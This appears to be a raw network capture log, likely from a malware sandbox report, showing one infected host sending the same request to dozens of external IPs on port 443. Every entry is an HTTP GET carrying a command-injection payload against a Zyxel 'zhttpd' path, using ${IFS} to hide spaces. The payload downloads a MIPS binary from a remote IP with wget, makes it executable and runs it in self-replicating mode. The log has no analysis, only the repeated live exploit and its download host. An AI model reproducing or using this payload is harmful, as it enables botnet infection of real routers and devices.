                                                Jan 29, 2024 07:07:58.549547911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7018192.168.2.235493278.16.187.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549618006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7019192.168.2.234522699.111.38.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549633980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7020192.168.2.23508081.137.77.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549660921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7021192.168.2.2337224177.80.158.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549710035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7022192.168.2.2342348175.34.98.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549758911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7023192.168.2.2339464124.182.211.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549786091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7024192.168.2.2337784146.234.124.21443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549819946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7025192.168.2.2360750198.68.98.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549874067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7026192.168.2.2336310206.13.150.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549906015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7027192.168.2.233756069.11.55.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.549977064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7028192.168.2.2352402189.135.166.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550026894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7029192.168.2.2346752203.229.247.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550035000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7030192.168.2.2353180115.205.32.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550072908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7031192.168.2.2333234111.229.170.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550086021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7032192.168.2.2358304130.90.30.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550110102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7033192.168.2.235512214.35.182.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550143003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7034192.168.2.2341560183.5.252.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550175905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7035192.168.2.235174295.154.109.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550220013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7036192.168.2.235935064.115.64.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550240040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7037192.168.2.2334248156.186.232.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550290108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7038192.168.2.2339600100.134.222.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550312042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7039192.168.2.2344602182.47.181.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550349951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7040192.168.2.2335920185.59.92.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550380945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7041192.168.2.234320646.148.162.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550412893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7042192.168.2.236014661.91.116.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550456047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7043192.168.2.234536877.143.193.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550468922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7044192.168.2.235023245.32.44.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550529003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7045192.168.2.2347632124.250.92.99443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550569057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7046192.168.2.2352982193.255.30.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550601959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7047192.168.2.235580870.202.14.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550646067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7048192.168.2.2360776199.125.218.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550685883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7049192.168.2.2348440122.212.77.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550740957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7050192.168.2.2339998105.237.22.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550750971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7051192.168.2.233959470.234.199.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550808907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7052192.168.2.2332874200.230.16.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550844908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7053192.168.2.2345722195.17.178.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550884008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7054192.168.2.234338865.76.56.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550919056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7055192.168.2.235736447.88.218.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.550971985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7056192.168.2.234057451.172.44.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551006079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7057192.168.2.234374878.31.78.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551039934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7058192.168.2.2337034142.88.216.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551079035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7059192.168.2.2349980195.12.103.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551107883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7060192.168.2.235394853.215.201.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551161051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7061192.168.2.234089458.253.36.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551189899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7062192.168.2.2360114212.229.1.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551230907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7063192.168.2.2336160173.6.248.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551274061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7064192.168.2.2333758141.157.237.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551306009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7065192.168.2.2353518202.153.185.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551338911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7066192.168.2.233534245.210.204.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551367044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7067192.168.2.2349278160.190.23.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551429033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7068192.168.2.233739679.111.113.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551449060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7069192.168.2.2352444139.144.111.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551486969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7070192.168.2.2357316157.17.161.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551537037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7071192.168.2.234536668.141.133.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551568031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7072192.168.2.2356198142.87.130.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551592112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7073192.168.2.2352298170.39.116.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551659107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7074192.168.2.235005096.144.8.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551696062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7075192.168.2.235186043.164.122.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551734924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7076192.168.2.2348722111.179.162.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551760912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7077192.168.2.2335342122.1.131.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551810026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7078192.168.2.233431441.175.168.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551826954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7079192.168.2.2334156216.177.78.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551907063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7080192.168.2.2348086102.76.72.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:58.551920891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7081192.168.2.2351268155.186.252.172443
                                                TimestampBytes transferredDirectionData
